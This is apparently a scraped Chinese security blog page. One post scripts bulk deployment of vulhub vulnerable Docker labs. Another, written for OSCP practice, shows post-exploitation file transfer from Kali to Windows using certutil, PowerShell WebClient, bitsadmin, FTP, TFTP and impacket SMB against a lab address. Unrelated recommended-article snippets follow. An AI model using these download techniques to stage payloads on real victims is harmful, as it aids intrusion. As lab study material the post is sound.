坦笑&&life

oscp--python

测试的 VM 主机主要来源 www.vulnhub.com

OSCP - Lazysysadmin 的破解

OSCP - DerpNStink 的破解

OSCP - 6Days_Lab-v1.0.1 的破解

OSCP - 64Base_3mrgnc3 的破解

OSCP - CH4INRULZ_v1.0.1 的破解

OSCP - JIS-CTF-VulnUpload-CTF01 的破解

OSCP - Typhoon 1.02 的破解

OSCP - Raven: 1 的破解

OSCP - FourAndSix 2.01 的破解

最近在研究漏洞原理及复现
参考链接：https://blog.ropnop.com/transferring-files-from-kali-to-windows/

漏洞复现01-vulhub环境自动部署

2020年7月11日21:32:59 【原创】

1. 简介

目的：自动批量拉取 vulhub 镜像

vulhub 官网地址：https://vulhub.org/

root@ubuntu:~# git clone https://github.com/vulhub/vulhub

  
  
    
    
    
    
  
  
    
    
    
    
     
     
     
     1

或者浏览器下载 https://codeload.github.com/vulhub/vulhub/zip/master

vulhub目前包括 157 漏洞环境，但是在需要进行环境部署的时候，往往会出现拉取时间长的问题，所以我们需要在电脑中常备一个完整的靶机环境，通常在需要批量部署的时候，我们就要考虑写脚本了。

话不多少，先分析人工部署的过程

2 安装 docker

我在这里使用的是 ubuntu 2020 Dekstop版

docker 安装参考 https://blog.csdn.net/m82_a1/article/details/98870376

卸载原有版本

# 卸载原有版本
sudo apt-get remove docker docker-engine docker-ce docker.io

如果需要删除所有镜像，容器和卷（第一次安装请忽略）：

sudo rm -rf /var/lib/docker

备注：apt-get remove会保留软件的配置文件如果想删除请执行以下操作

查看相关软件包是否有残余：

dpkg -l | grep docker

使用purage清除配置文件：

sudo apt-get purge docker-ce

更新索引包

sudo apt-get update

安装 docker


# 安装添加使用 HTTPS 传输的软件包
sudo apt-get -y install apt-transport-https ca-certificates curl software-properties-common

添加软件源的GPG密钥（本人选择的中科大）

中科大：

curl -fsSL https://mirrors.ustc.edu.cn/docker-ce/linux/ubuntu/gpg | sudo apt-key add -

阿里云：

curl -fsSL http://mirrors.aliyun.com/docker-ce/linux/ubuntu/gpg | sudo apt-key add -

官方源：

curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -

向 source.list 中添加Docker软件源（本人选择的中科大）

中科大源：

sudo add-apt-repository “deb [arch=amd64] https://mirrors.ustc.edu.cn/docker-ce/linux/ubuntu $(lsb_release -cs) stable”

阿里源：

sudo add-apt-repository “deb [arch=amd64] http://mirrors.aliyun.com/docker-ce/linux/ubuntu $(lsb_release -cs) stable”

官方源：

sudo add-apt-repository “deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable”

再次更新索引包

sudo apt-get update

若想直接安装最新版本执行以下命令即可

sudo apt-get install docker-ce

查看docker版本

apt-cache madison docker-ce

查看Docker版本信息

docker version

安装 docker-ce


apt-cache madison docker-ce
apt-get install docker-ce=

例如：

sudo apt-get install docker-ce=5:19.03.9_3-0ubuntu-focal

启动服务

	
# 启动后台服务(三选一)
sudo service docker restart
/etc/init.d/docker restart
systemctl restart docker

镜像加速

新版的 Docker 使用 /etc/docker/daemon.json 来配置 Daemon。

请在该配置文件中加入（没有该文件的话，请先建一个）Docker中国官方加速：

{
“registry-mirrors”:[“https://f3lu6ju1.mirror.aliyuncs.com”]
}

安装 docker-compose

参考 https://blog.csdn.net/LUCKWXF/article/details/96131392

apt install python3-pip #（ubuntu）
yum install python3-pip #（centos）

pip3 install docker-compose

3. 人工部署过程

根据官方教程，只需要执行

docker-compose up -d

 
 
   
   
   
   
 
 
   
   
   
   
    
    
    
    1

主要过程是 docker-compose 命令根据 docker-compose.yml 文件中的配置来拉取镜像，所以需要在有 docker-compose.yml 文件的目录下执行拉取镜像命令。

执行步骤如下：

cd /src/vulhub/activemq/CVE-2015-5254
docker-compose up -d

使用完毕后，还要停止镜像

docker-compose down

根据网速，每个镜像都会消耗很多时间，如果这157个全部安装完，基本要花费好几天的时间来拉取镜像，不爽！

4. 自动化拉取镜像

每个镜像执行的过程中都会经历三步：

切换路径（cd 到某路径）
docker-compose up -d
docker-compose down

基于这个思路，制作一个 bash 脚本，内容是自动切换路径，然后自动拉取，再自动停止，然后换下一个…

创建 python3 的文件

cd /home/ubuntu/Desktop/
vim  test.py

 
 
   
   
   
   
 
 
   
   
   
   
    
    
    
    1
    
    
    
    2

内容如下：

import os

for parent, dirnames, filenames in os.walk(“/src/vulhub/”):
print(“----------------------------------”)

print(parent)
if dirnames:
    print(dirnames)

if "docker-compose.yml" in filenames:
    print("+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+")
    print(parent)
    with open("optput.sh", "a") as file_tmp:
        file_tmp.truncate()
        file_tmp.write("cd "+ parent + "\n")
        file_tmp.write('echo "'+ parent + '"\n')
        file_tmp.write('echo "------------------------------------"\n')
        file_tmp.write("docker-compose up -d\n")
        file_tmp.write("docker-compose down\n\n")
    # continue

运行test.py文件

pythpn3 test.py

 
 
   
   
   
   
 
 
   
   
   
   
    
    
    
    1

会自动生成一个文件 output.sh

然后就可以自动运行脚本程序了

chmod 777 optput.sh
sh optput.sh

 
 
   
   
   
   
 
 
   
   
   
   
    
    
    
    1
    
    
    
    2

然后睡一觉，就全部拉取完成了

准备考 OSCP，发现有意思的数据传输方式，特此练习一遍
参考链接：https://blog.ropnop.com/transferring-files-from-kali-to-windows/

将文件从Linux传输到Windows（后期利用）

2019年3月30日17:29:09 【原创】

1. 简介

简介
无论那种情况，我们有时候会需要从 linux 系统传输数据到 windows 系统，尤其是文件。但是往往 nc 没有同时存在于双方系统上，此时就需要其他的简便方法来操作。

nc 文件传输
nc 使用：传送门 – Kali Linux渗透测试 003 基本工具–NC

 • 传输文件( B->A )
 A：root@kali:~# nc -lp 4444 > 2.mp4
 B：root@metasploitable:~# nc -nv 192.168.1.100 4444 < AWVS\ 01.avi -q 1
 或(A->B)
 A：root@kali:~# nc -q 1 -lp 4444 < 2.mp4 
 B：root@metasploitable:~# nc -nv 192.168.1.100 4444 > 3.mp4

• 传输目录
A：root@kali:~# tar zcvf - testdir/ | nc -lp 4444 -q 1
B：root@metasploitable:~# nc 192.168.1.100 4444 | tar zxvf -

2. HTTP

启动 apache 服务器

 root@kali:~# /etc/init.d/apache2 start
 [ ok ] Starting apache2 (via systemctl): apache2.service.
 root@kali:~# netstat -tulnp | grep 80
 tcp6       0      0 :::80                   :::*                    LISTEN      1248/apache2        

   
   
     
     
     
     
   
   
     
     
     
     
      
      
      
      1
      
      
      
      2
      
      
      
      3
      
      
      
      4

可以看到打开 80 端口，如果使用 apache 环境，需要经文件复制进 /var/www/html/ 目录

 root@kali:~# cp team.exe /var/www/html/

   
   
     
     
     
     
   
   
     
     
     
     
      
      
      
      1

或者使用 python 自带的模块搭建简单的 HTTP 环境
如果不需要再使用，可以先停止 apache 服务

 root@kali:~# /etc/init.d/apache2 stop

root@kali:~# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 …

此时 HTTP 监听的根目录是运行此命令当前所在的目录（我的环境是 root 家目录）

进行文件下载

使用浏览器进行下载

 浏览器访问 http://10.10.10.166/team.exe

    
    
       
       
       
       
    
    
       
       
       
       
        
        
        
        1

windows 环境可以使用 certutil.exe 工具

 PS C:\Users\John> certutil.exe -urlcache -split -f "http://10.10.10.166/team.exe" team.exe

    
    
       
       
       
       
    
    
       
       
       
       
        
        
        
        1

windows 环境可以使用 powershell 环境

 PS C:\Users\John> powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.10.166:8000/team.exe','team.exe')"

    
    
       
       
       
       
    
    
       
       
       
       
        
        
        
        1

另外还有 bitsadmin 工具

 PS C:\Users\John> bitsadmin /transfer n http://10.10.10.166:8000/team.exe  D:\PSTools.zip

    
    
       
       
       
       
    
    
       
       
       
       
        
        
        
        1

参考资料：

https://www.cnblogs.com/gayhub/p/6517655.html

https://stackoverflow.com/questions/28143160/how-can-i-download-a-file-with-batch-file-without-using-any-external-tools

linux 环境

 root@ubuntu:~# curl http://10.10.10.166:8000/team.exe   > team.exe  
 root@ubuntu:~# wget http://10.10.10.166:8000/ssh_login.txt

    
    
       
       
       
       
    
    
       
       
       
       
        
        
        
        1
        
        
        
        2

3. FTP

启动

使用 python 模块

 # 使用前需要先安装 python 模块
 root@kali:~#  apt-get install python-pyftpdlib
 root@kali:~#  python -m pyftpdlib -p 21

     
     
         
         
         
         
     
     
         
         
         
         
          
          
          
          1
          
          
          
          2
          
          
          
          3

如果要授予匿名用户写入权限，请同时添加该-w标志。

使用 MSF

 	Module options (auxiliary/server/ftp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
FTPPASS                    no        Configure a specific password that should be allowed access
FTPROOT   /tmp/ftproot     yes       The FTP root directory to serve files from
FTPUSER                    no        Configure a specific username that should be allowed access
PASVPORT  0                no        The local PASV data port to listen on (0 is random)
SRVHOST   0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT   21               yes       The local port to listen on.
SSL       false            no        Negotiate SSL for incoming connections
SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)

Auxiliary action:

Name     Description
----     -----------
Service

msf5 auxiliary(server/ftp) > set FTPROOT /root
msf5 auxiliary(server/ftp) > run -j
[*] Auxiliary module running as background job 0.

[] Started service listener on 0.0.0.0:21
[] Server started.

进行在后台运行，结束可以使用 jobs -k

下载，使用 anonymous 账户登录

 PS C:\Users\John> ftp 10.10.10.166
 连接到 10.10.10.166。
 220 FTP Server Ready
 500 'OPTS UTF8 ON': command not understood.
 用户(10.10.10.166:(none)): anonymous
 331 User name okay, need password...
 密码:
 230 Login OK
 ftp> dir
 200 PORT command successful.
 425 Can't build data connection
 ftp> ls
 200 PORT command successful.
 500 'NLST ': command not understood.
 ftp> binary
 200 Type is set
 ftp> dir
 200 PORT command successful.
 150 Opening ASCII mode data connection for /bin/ls
 total 1888
 drwxr-xr-x   2 0      0       512 Jan  1  2000 lmg
 drwxr-xr-x   2 0      0       512 Jan  1  2000 Downloads
 -rwxr-xr-x   2 0      0       512 Jan  1  2000 team.exe
 -rw-r--r--   1 0      0       1515 Jan  1  2000 .viminfo
 226 Transfer complete.
 ftp: 收到 1903 字节，用时 0.14秒 13.59千字节/秒。
 ftp> get team.exe
 200 PORT command successful.
 150 Opening BINARY mode data connection for team.exe
 226 Transfer complete.
 ftp: 收到 4803401 字节，用时 0.05秒 102200.02千字节/秒。
 ftp>

  
  
     
     
     
     
  
  
     
     
     
     
      
      
      
      1
      
      
      
      2
      
      
      
      3
      
      
      
      4
      
      
      
      5
      
      
      
      6
      
      
      
      7
      
      
      
      8
      
      
      
      9
      
      
      
      10
      
      
      
      11
      
      
      
      12
      
      
      
      13
      
      
      
      14
      
      
      
      15
      
      
      
      16
      
      
      
      17
      
      
      
      18
      
      
      
      19
      
      
      
      20
      
      
      
      21
      
      
      
      22
      
      
      
      23
      
      
      
      24
      
      
      
      25
      
      
      
      26
      
      
      
      27
      
      
      
      28
      
      
      
      29
      
      
      
      30
      
      
      
      31
      
      
      
      32

也可以浏览器直接访问 ftp:// 10.10.10.166
另外，如果是命令行环境，可以一步直接下载

 # 创建文件：ftp_commands.txt
 open 10.10.10.166
 anonymous  
 whatever  
 binary  
 get team.exe  
 bye

执行命令

PS C:\Users\John> ftp -s:ftp_commands.txt

4. TFTP

启动

默认安装在Windows XP中

MSF

 	Module options (auxiliary/server/tftp):
Name        Current Setting  Required  Description
----        ---------------  --------  -----------
OUTPUTPATH  /tmp             yes       The directory in which uploaded files will be written.
SRVHOST     0.0.0.0          yes       The local host to listen on.
SRVPORT     69               yes       The local port to listen on.
TFTPROOT    /tmp             yes       The TFTP root directory to serve files from

Auxiliary action:

Name     Description
----     -----------
Service

msf5 auxiliary(server/tftp) > set TFTPROOT /root
TFTPROOT => /root
msf5 auxiliary(server/tftp) > run -j
[*] Auxiliary module running as background job 1.

[] Starting TFTP server on 0.0.0.0:69…
[] Files will be served from /root
[*] Uploaded files will be saved in /tmp

下载

windows 10 环境默认带有 tftp 客户端，如果不带，就可以使用 pkgmgr /iu:“TFTP” 命令

 PS C:\Users\John> tftp -i 10.10.10.166 GET team.exe

    
    
       
       
       
       
    
    
       
       
       
       
        
        
        
        1

5. SMB

在linux启动 samba服务

 root@kali:~# git clone  https://github.com/CoreSecurity/impacket
 root@kali:~# cd impacket/
 root@kali:~/impacket# python3 setup.py install
 root@kali:~/impacket# cd examples/
 root@kali:~/impacket/examples# python smbserver.py ROPNOP /root
 Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
 [*] Config file parsed
 [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
 [*] Config file parsed
 [*] Config file parsed
 [*] Config file parsed

   
   
       
       
       
       
   
   
       
       
       
       
        
        
        
        1
        
        
        
        2
        
        
        
        3
        
        
        
        4
        
        
        
        5
        
        
        
        6
        
        
        
        7
        
        
        
        8
        
        
        
        9
        
        
        
        10
        
        
        
        11
        
        
        
        12

在一行中，我们已经启动并运行了SMB共享。您可以smbclient从Linux 确认一下是否已经开启：

 root@kali:~# smbclient -L 10.10.10.166 --no-pass
Sharename       Type      Comment
---------       ----      -------
ROPNOP          Disk      
IPC$            Disk

Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.10.166 failed (Error NT_STATUS_CONNECTION_REFUSED)
Failed to connect with SMB1 – no workgroup available

或者在 windows 使用 net view 看一下

 PS C:\Users\John> net view \\10.10.10.166

 
 
     
     
     
     
 
 
     
     
     
     
      
      
      
      1

本文记录 python 的学习过程

基于python3的加密工具-python基础

Python黑帽子-黑客与渗透测试编程之道 Python黑帽子-黑客与渗透测试编程之道

python2.7 + zbar 二维码运行环境

《python密码学编程》笔记

python3 + wxpython 实现 AES 加密工具

python3 + wxpython 实现 RSA 安全传输工具

python3 + wxpython 实现RSA加密聊天室

python2.7 + wxpython +zbar 实现二维码的生成、嵌入和提取

python3 + wxpython 实现基于 metasploit 的安全扫描工具

保存CSDN 中的博客文章为本地文件

python基础
Python黑帽子-黑客与渗透测试编程之道
python2.7 + zbar 二维码运行环境
《python密码学编程》笔记
python3 + wxpython 实现 AES 加密工具
python3 + wxpython 实现 RSA 安全传输工具
python3 + wxpython 实现RSA加密聊天室
python2.7 + wxpython +zbar 实现二维码的生成、嵌入和提取
python3 + wxpython 实现基于 metasploit 的安全扫描工具
保存CSDN 中的博客文章为本地文件

网络安全打工人

【Python】一文详细介绍 py格式文件高斯小哥 Python基础【高质量合集】python 新手入门学习
【Python】一文详细介绍py格式文件个人主页：高斯小哥高质量专栏：Matplotlib之旅：零基础精通数据可视化、Python基础【高质量合集】、PyTorch零基础入门教程希望得到您的订阅和支持~创作高质量博文(平均质量分92+)，分享更多关于深度学习、PyTorch、Python领域的优质内容！（希望得到您的关注~）文章目录一、py格式文件简介二、如何创建和编辑py格式文件三、如何运行py
python抓包与解包_Python—网络抓包与解包（pcap、dpkt） weixin_39691055 python抓包与解包
pcap安装[root@localhost~]#pipinstallpypcap抓包与解包#-*-coding:utf-8-*-importpcap,dpktimportre,threading,requests__black_ip=['103.224.249.123','203.66.1.212']#抓包：param1eth_name网卡名，如：eth0,eth3。param2p_type日志捕
美团自动配送车2024春季招聘 | 社招专场美团技术团队
关于美团自动配送团队美团自动配送以自研L4级自动驾驶软硬件技术为核心，与美团即时零售业务结合，形成满足公开道路、校园、社区、工业园区等室外全场景下的自动配送整体解决方案。美团自动配送团队成立于2016年，团队成员来自于Waymo、Cruise、Pony.ai、泛亚等自动驾驶行业头部公司，自动驾驶技术团队博士占比高达30%，依靠视觉、激光等传感器，实时感知预测周围环境，通过高精地图定位和智能决策规划
华为OD机试 - 单向链表中间节点（Java & JS & Python & C & C++）华为OD题库华为od 链表 java
须知哈喽，本题库完全免费，收费是为了防止被爬，大家订阅专栏后可以私信联系退款。感谢支持文章目录须知题目描述输出描述解析代码题目描述给定一个单链表L，请编写程序输出L中间结点保存的数据。如果有两个中间结点，则输出第二个中间结点保存的数据。例如：给定L为1→7→5，则输出应该为7；给定L为1→2→3→4，则输出应该为3；输入描述每个输入包含1个测试用例。每个测试用例：第一行给出链表首结点的地址、结点总
python 推导式(派生、衍生) sanduo112 人工智能 python windows 开发语言
python推导式一、推导式(派生、衍生)1.Python推导式是一种独特的数据处理方式，可以从一个数据序列构建另一个新的数据序列的结构体。2.列表(list)推导式3.字典(dict)推导式4.集合(set)推导式5.元组(tuple)推导式二、代码概述一、推导式(派生、衍生)1.Python推导式是一种独特的数据处理方式，可以从一个数据序列构建另一个新的数据序列的结构体。Python支持各种数
数据挖掘|数据预处理|基于Python的数据标准化方法皖山文武数据挖掘数据建模与分析 python 数据挖掘开发语言
基于Python的数据标准化方法1.z-score方法2.极差标准化方法3.最大绝对值标准化方法在数据分析之前，通常需要先将数据标准化（Standardization），利用标准化后的数据进行数据分析，以避免属性之间不同度量和取值范围差异造成数据对分析结果的影响。1.z-score方法Z-score方法是基于原始数据的均值和标准差来进行数据标准化的，处理后的数据均值为0，方差为1，符合标准正态分布
CSV指南：Python程序获取大型CSV文件行数孤独打铁匠Julian 笔记经验分享 python
本指南提供了几种使用Python来获取大型CSV文件行数的方法，并解释了每种方法的适用场景。方法1:使用csv.reader处理复杂CSV文件当你的CSV文件中包含多行字段（即某些字段的值中包含换行符）时，使用csv.reader是一个可靠的选择，因为它能够正确处理这些复杂情况。这个方法适用于大多数大小的CSV文件，但是对于非常大的文件，读取整个文件可能会占用较多的时间和内存。对于极大的文件，考虑
浙江女大学生“卖淫日记”曝光，震惊全网：背后还藏着一个真相地球上的星星_272e
作者/在风来源/微信公众号：自黑思维最近，一个新闻震碎无数人的三观：在浙江农林大学，有一位女大学生，在网上公开自己的“卖淫日记”，无论是文字还是图片，都非常露骨。而目前关于这事的瓜，都已经被删得七七八八，但我有保留截图的习惯，所以才有了这篇文章。首先，必须要强调的一点，就是这事不是谣传，是真的，学校已经出来证实过。只是学校表示该名女学生有精神病。但到底是不是真的精神有问题？我们可以从她的日记里，略
谷歌浏览器驱动Chromedriver（114-120版本）文件以及驱动下载教程 pigerr杨 Python python chrome drivers
ChromeDriver官方网站GitHub||GoogleChromeLabs/chrome-for-testingChromeDriver113-125_JSONChromeforTestingavailability123-125zip白月黑羽Python基础|进阶|Qt图形界面|Django|自动化测试|性能测试|JS语言|JS前端|原理与安装
大创项目推荐深度学习 opencv python 公式识别(图像识别机器视觉) laafeer python
文章目录0前言1课题说明2效果展示3具体实现4关键代码实现5算法综合效果6最后0前言优质竞赛项目系列，今天要分享的是基于深度学习的数学公式识别算法实现该项目较为新颖，适合作为竞赛课题方向，学长非常推荐！学长这里给一个题目综合评分(每项满分5分)难度系数：3分工作量：4分创新点：4分更多资料,项目分享：https://gitee.com/dancheng-senior/postgraduate1课题
网络安全（黑客）——自学2024 小言同学喜欢挖漏洞 web安全安全网络学习网络安全信息安全渗透测试
01什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。02怎样规划网络安全如果你是一
黑客（网络安全）技术自学30天一个迷人的黑客 web安全安全网络笔记网络安全信息安全渗透测试
01什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。02怎样规划网络安全如果你是一
python转码 Desamond python 开发语言
转码在许多场景中都有应用，以下是一些常见的场景：网页开发：当用户在网页上输入文本时，可能需要将特殊字符（如空格、引号、特殊符号等）进行转码，以防止这些字符对URL或HTML代码产生干扰。文件名处理：在处理文件名时，可能需要将特殊字符进行转码，以避免文件名被错误地解析或显示。数据传输：在数据传输过程中，为了确保数据的完整性和正确性，可能需要将数据中的特殊字符进行转码。数据存储：在数据库或数据存储中，
排序算法太多？常用排序都在这了，一篇文章总结和实现所有面试会考的排序算法（基于Python实现）宇宙之一粟不归路之Python #IT面试题收集与总结数据结构与算法算法数据结构排序算法 python java
文章目录排序算法1.常见的排序算法1.1选择排序1.1.1思想1.1.2实现**1.1.3选择排序分析**1.2冒泡排序**1.2.1思想****1.2.2实现****1.2.3冒泡排序分析**1.3插入排序**1.3.1思想****1.3.2实现****1.3.3插入排序分析**1.4归并排序☆☆★**1.4.1思想****1.4.2实现****1.4.3归并排序分析**1.5快速排序☆★★**
27.Python从入门到精通—Python异常处理抛出异常用户自定义异常定义清理行为预定义的清理行为以山河作礼。 #Python基础入门—详解版 python java 服务器
27.从入门到精通：Python异常处理抛出异常用户自定义异常定义清理行为预定义的清理行为异常处理抛出异常用户自定义异常定义清理行为预定义的清理行为异常处理在Python中，异常处理是一种处理程序在执行期间可能遇到的错误的方法。当Python解释器遇到错误时，它会引发异常。异常是一种Python对象，它包含有关错误的信息，例如错误类型和错误位置。为了处理异常，您可以使用try-except语句。在
python清华大学出版社答案_Python机器学习及实践 weixin_39805119 python清华大学出版社答案
第1章机器学习的基础知识1.1何谓机器学习1.1.1传感器和海量数据1.1.2机器学习的重要性1.1.3机器学习的表现1.1.4机器学习的主要任务1.1.5选择合适的算法1.1.6机器学习程序的步骤1.2综合分类1.3推荐系统和深度学习1.3.1推荐系统1.3.2深度学习1.4何为Python1.4.1使用Python软件的由来1.4.2为什么使用Python1.4.3Python设计定位1.4.
Python | Redis工具类 -拟墨画扇- Python redis 数据库缓存 python
一、需求自动连接Redis数据库，通过连接池处理数据对输出结果进行Log打印并保存到文件二、代码Utils.redisUtils.py#!/usr/bin/envpython#-*-coding:utf-8-*-importredisfromUtils.loggerimportlog"""Redis数据格式(1)字符串|存储形式:key-value:str-存储二进制数据:可以存储任意类型的数据，
直返APP是由哪个团队开发的？这个团队有哪些特点和优势？日常购物技巧呀
关于直返的创始人以及直返APP属于哪个公司，目前没有确切的公开信息。不过，一些网友认为，直返这种商业模式可能由多个不同的公司或团队所创造和运营。【高省】APP（高佣金领导者）是一个自用省钱佣金高，分享推广赚钱多的平台，百度有几百万篇报道，运行三年，稳定可靠。高省APP，是2021年推出的平台，0投资，0风险、高省APP佣金更高，模式更好，终端用户不流失。高省是公认的返利最高的软件。古楼导师高省邀请
Python dict字符串转json对象，小数精度丢失问题朝如青丝暮成雪 json python
一前言JSON(JavaScriptObjectNotation)是一种轻量级的数据交换格式，dict是Python的一种数据格式。本篇介绍一个float数据转换时精度丢失的案例。二问题描述importjsontest_str1='{"π":3.1415926535897932384626433832795028841971}'test_str2='{"value":10.00000}'print
自学黑客（网络安全）技术——2024最新九九归二 web安全安全学习笔记网络网络安全信息安全
01什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。02怎样规划网络安全如果你是一
Python+Requests模拟发送GET请求爱学习的执念自动化测试软件测试技术分享 python 开发语言
模拟发送GET请求前置条件：导入requests库一、发送不带参数的get请求代码如下：以百度首页为例importrequests#发送get请求response=requests.get(url="http://www.baidu.com")print(response.content.decode("utf-8"))#以utf-8的编码输出内容二、发送带参数的get请求发送带参数的get请求有
Python极速入门：五分钟开启实战之旅！知白守黑V Python 编程语言系统运维 python 编程语言 python开发 python学习 python入门 python数据分析
1.Python基础语法和结构：了解Python的基本语法，包括变量、数据类型、运算符、注释等。控制流：掌握条件语句（if-elif-else）、循环（for和while）及其控制（break和continue）。函数：学习如何定义和使用函数，包括参数传递、返回值、作用域和闭包。模块和包：理解如何导入和使用模块，以及如何创建和使用自己的包。2.数据处理列表、元组和集合：学习这些序列类型的操作和方法
Python Flask 使用数据库安果移不动 python flask 开发语言
pipinstallflask_sqlalchemy官方文档：Flask-SQLAlchemy—Flask-SQLAlchemyDocumentation(3.1.x)为了不报错也需要导入另外两个库#pipinstallflask_sqlalchemy#pipinstallmysqlclient完整代码importosfromflaskimportFlaskfromflask_sqlalchemy
PaperWeekly sapienst Papers PaperwithCode General ML
1.Python软件包解决DL在未见过的数据分布下性能差的问题：（1）神经网络和损失分离的模块化设计（2）强大便捷的基准测试能力（3）易于使用但难以修改（4）github:https://github.com/marrlab/domainlabTrainer和Models之间是什么关系Trainer和Models是DomainLab中的两个核心概念。Trainer是一个用于指导数据流向模型并计算S
Nginx服务老伙子53 nginx 运维
Nginx服务一、什么是Nginx1、概念Nginx是一个高性能的开源的HTTP和反向代理服务器，以及邮件（IMAP/POP3）代理服务器。它最初由IgorSysoev创建，并于2004年首次公开发布。Nginx的主要特点包括高性能、低内存占用、高并发处理能力以及高度的可靠性。2、特点高性能Nginx被设计成高性能的服务器软件，能够处理大量并发连接和高流量的请求。它采用了事件驱动的架构，使用异步I
使用Python读取Excel文件并计算平均分嘻嘻爱编码 Python从入门到放弃 python excel 开发语言
在这篇博客中，我们将探讨如何使用Python的pandas库来读取Excel文件，并计算其中数据的平均分。pandas是一个强大的数据分析工具，它允许我们以简单直观的方式处理表格数据。安装必要的库在开始之前，确保你的环境中安装了pandas和openpyxl库。可以使用以下命令进行安装：pipinstallpandasopenpyxl读取Excel文件首先，我们需要读取Excel文件。假设我们有一
python项目练习——7.网站访问日志分析器 F—— python项目练习 python 信息可视化数据分析数据挖掘开发语言学习
项目功能分析：这个项目可以读取网站的访问日志文件，统计访问量、独立访客数、访问来源等信息，并以图表或表格的形式展示出来。这个项目涉及到文件操作、数据处理、数据可视化等方面的技术。示例代码：importrefromcollectionsimportCounterimportmatplotlib.pyplotaspltdefparse_log_file(log_file):#读取日志文件内容witho
python的while双重循环九九乘法表 Jinm_R python 开发语言
a=1whilea<=9:b=1#乘数每次需要从1开始whileb<=a:print(f"{a}*{b}={a*b}\t",end='')#\t为制表符使乘法表整齐end=''代表用空格代替换行b+=1a+=1print()#乘数每加一换行
【Python】成功解决ModuleNotFoundError: No module named ‘torchinfo‘ 高斯小哥 BUG解决方案合集 python pytorch 新手入门学习 debug
【Python】成功解决ModuleNotFoundError:Nomodulenamed‘torchinfo’个人主页：高斯小哥高质量专栏：Matplotlib之旅：零基础精通数据可视化、Python基础【高质量合集】、PyTorch零基础入门教程希望得到您的订阅和支持~创作高质量博文(平均质量分92+)，分享更多关于深度学习、PyTorch、Python领域的优质内容！（希望得到您的关注~）文
使用Github+PicGo搭建个人图床水煮养乐多
写在开头每个人都需要一个自己的个人图床，什么是图床？图床就是把图片存到服务器上，通过一个公开的链接地址进行访问或者下载平时我们将图片夹杂在文章、文档、公众号、博客当中，一般情况下这样似乎没有任何问题，可试想一下若我们需要同时维护多份，不停地在不同渠道重复上传、编辑，图片也会散落各地，难以维护管理，这时候若有个统一的存储地方就可以很轻松维护。我们将图片直接放到在线静态页面当中的话，在访问时需要等待全
安装数据库首次应用 Array_06 java oracle sql
可是为什么再一次失败之后就变成直接跳过那个要求 enter full pathname of java.exe的界面这个java.exe是你的Oracle 11g安装目录中例如：【F:\app\chen\product\11.2.0\dbhome_1\jdk\jre\bin】下的java.exe 。不是你的电脑安装的java jdk下的java.exe！注意第一次，使用SQL D
Weblogic Server Console密码修改和遗忘解决方法 bijian1013 Welogic
在工作中一同事将Weblogic的console的密码忘记了，通过网上查询资料解决，实践整理了一下。一.修改Console密码打开weblogic控制台，安全领域 --> myrealm -->&n
IllegalStateException: Cannot forward a response that is already committed Cwind java Servlets
对于初学者来说，一个常见的误解是：当调用 forward() 或者 sendRedirect() 时控制流将会自动跳出原函数。标题所示错误通常是基于此误解而引起的。示例代码： protected void doPost() { if (someCondition) { sendRedirect(); } forward(); // Thi
基于流的装饰设计模式木zi_鸣设计模式
当想要对已有类的对象进行功能增强时，可以定义一个类，将已有对象传入，基于已有的功能，并提供加强功能。自定义的类成为装饰类模仿BufferedReader，对Reader进行包装，体现装饰设计模式装饰类通常会通过构造方法接受被装饰的对象，并基于被装饰的对象功能，提供更强的功能。装饰模式比继承灵活，避免继承臃肿，降低了类与类之间的关系装饰类因为增强已有对象，具备的功能该
Linux中的uniq命令被触发 linux
Linux命令uniq的作用是过滤重复部分显示文件内容，这个命令读取输入文件，并比较相邻的行。在正常情况下，第二个及以后更多个重复行将被删去，行比较是根据所用字符集的排序序列进行的。该命令加工后的结果写到输出文件中。输入文件和输出文件必须不同。如果输入文件用“- ”表示，则从标准输入读取。 AD： uniq [选项] 文件说明：这个命令读取输入文件，并比较相邻的行。在正常情况下，第二个
正则表达式Pattern 肆无忌惮_ Pattern
正则表达式是符合一定规则的表达式，用来专门操作字符串，对字符创进行匹配，切割，替换，获取。例如，我们需要对QQ号码格式进行检验规则是长度6~12位不能0开头只能是数字，我们可以一位一位进行比较，利用parseLong进行判断，或者是用正则表达式来匹配[1-9][0-9]{4,14} 或者 [1-9]\d{4,14} &nbs
Oracle高级查询之OVER (PARTITION BY ..) 知了ing oracle sql
一、rank()/dense_rank() over(partition by ...order by ...) 现在客户有这样一个需求，查询每个部门工资最高的雇员的信息，相信有一定oracle应用知识的同学都能写出下面的SQL语句： select e.ename, e.job, e.sal, e.deptno from scott.emp e, (se
Python调试矮蛋蛋 python pdb
